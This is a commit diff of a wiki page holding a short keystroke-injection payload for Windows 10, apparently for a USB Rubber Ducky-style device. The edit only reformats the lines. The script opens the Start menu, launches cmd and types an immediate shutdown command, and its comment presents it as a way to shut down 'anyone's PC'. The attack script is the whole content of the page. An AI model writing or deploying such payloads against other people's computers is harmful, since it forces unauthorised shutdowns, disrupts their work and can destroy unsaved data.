Updated Payload Windows 10 : Shut down (markdown)

This commit is contained in:
gaspypm 2016-12-21 21:54:06 -03:00
parent 523581a955
commit d2db39dd06
1 changed files with 7 additions and 7 deletions

View File

@ -1,7 +1,7 @@
`REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code.`
`CONTROL ESCAPE`
`DELAY 400`
`STRING cmd`
`DELAY 200`
`STRING shutdown.exe /s /t 00`
`ENTER`
* REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code.
* CONTROL ESCAPE
* DELAY 400
* STRING cmd
* DELAY 200
* STRING shutdown.exe /s /t 00
* ENTER